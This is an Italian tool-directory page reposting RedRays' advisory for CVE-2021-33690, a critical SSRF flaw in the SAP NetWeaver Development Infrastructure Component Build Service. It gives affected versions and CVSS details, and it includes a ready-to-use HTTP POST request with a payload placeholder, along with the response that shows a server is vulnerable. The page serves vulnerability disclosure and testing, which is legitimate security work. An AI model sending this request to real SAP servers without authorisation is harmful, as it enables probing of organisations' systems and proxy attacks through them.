Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-33690 — [CVE-2021-33690] Vulnerabilità di Server Side Request Forgery in SAP NetWeaver Development Infrastructure | Kitploit
Strumenti/GitHubGitHub/redrays-io/cve-2021-33690
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubredrays-io/cve-2021-33690

CVE-2021-33690

[CVE-2021-33690] Vulnerabilità di Server Side Request Forgery in SAP NetWeaver Development Infrastructure

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2021-33690

[CVE-2021-33690] Vulnerabilità Server Side Request Forgery in SAP NetWeaver Development Infrastructure

root@kitploit:~
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955 
SAP Approved Fixes: True
Status: analyzed and published

INFORMAZIONI SULL'ADVISORY
Titolo: [CVE-2021-33690] Vulnerabilità Server-Side Request Forgery in SAP NetWeaver Development Infrastructure
Rischio: Critico
URL dell'advisory: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Data di pubblicazione: 1 giugno 2023

INFORMAZIONI SULLA VULNERABILITÀ
Sfruttabile da remoto: Sì
Sfruttabile localmente: No

Informazioni CVSS
Punteggio base CVSS v3.1: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

DESCRIZIONE DELLA VULNERABILITÀ
È stata identificata una vulnerabilità nota come Server-Side Request Forgery (SSRF) in diverse versioni del 
Component Build Service di SAP NetWeaver Development Infrastructure, in particolare 7.11, 7.20, 7.30, 7.31, 7.40 e 7.50.
Questa debolezza all'interno del Component Build Service di SAP NetWeaver Development Infrastructure consente a un attaccante,
che ha accesso al server, di eseguire attacchi proxy tramite query appositamente create. Le conseguenze di 
tali attacchi possono portare al completo compromesso dei dati sensibili del server, compromettendone l'accessibilità. 
È fondamentale notare che la gravità di questa vulnerabilità dipende dal fatto che SAP NetWeaver 
Development Infrastructure (NWDI) operi sulla intranet o su Internet. Il punteggio CVSS è stato calcolato sulla base 
dello scenario peggiore, che presume il funzionamento online.

DESCRIZIONE TECNICA

Per determinare se il server è vulnerabile a SSRF, inviare la seguente richiesta:

POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded

CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE

Se si riceve la seguente risposta, ciò implica la presenza della vulnerabilità:

<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>


Informazioni su RedRays
RedRays è un'azienda leader nel settore della cybersecurity che protegge i sistemi ERP da attività fraudolente 
interne e minacce informatiche esterne. Siamo orgogliosi di offrire solide soluzioni di sicurezza per grandi 
aziende e fornitori di servizi gestiti che dipendono da importanti sistemi ERP come SAP, Oracle e Microsoft. 
Utilizzando strumenti e strategie avanzati, supervisioniamo e controlliamo proattivamente la sicurezza in 
estesi ambienti SAP a livello globale.

Il nostro obiettivo principale è colmare il divario di sicurezza sia dal punto di vista tecnico che aziendale, garantendo 
le operazioni senza interruzioni dei nostri clienti e proteggendo i loro preziosi dati. In RedRays, ci impegniamo a mantenere
standard di sicurezza di prim'ordine, offrendo al contempo un servizio e un'assistenza clienti straordinari.

Informazioni sul reparto R&D di RedRays
Il pilastro dei successi di RedRays risiede nel nostro reparto di ricerca e sviluppo (R&D), specializzato nello 
studio e nell'analisi delle vulnerabilità nelle applicazioni aziendali essenziali. Le nostre iniziative di R&D hanno ottenuto 
riconoscimento e ammirazione da importanti aziende software come SAP, Oracle, Microsoft Dynamics e IBM.
Questa dedizione alla ricerca ci consente di anticipare le minacce emergenti e di creare soluzioni di sicurezza su misura
per le esigenze dei nostri clienti.

Il nostro team è composto da professionisti esperti con competenze diversificate che coprono vari ambiti della sicurezza, 
come la valutazione delle vulnerabilità, il penetration testing, la gestione degli incidenti e l'intelligence sulle minacce. 
Il nostro impegno è quello di condurre ricerche approfondite e fornire soluzioni all'avanguardia per rafforzare i sistemi SAP 
contro le minacce in continua evoluzione.

Contatta RedRays

Per qualsiasi domanda o ulteriore dettaglio, non esitare a contattarci:

  • GitHub
  • Email
  • Sito web
Scarica lo strumento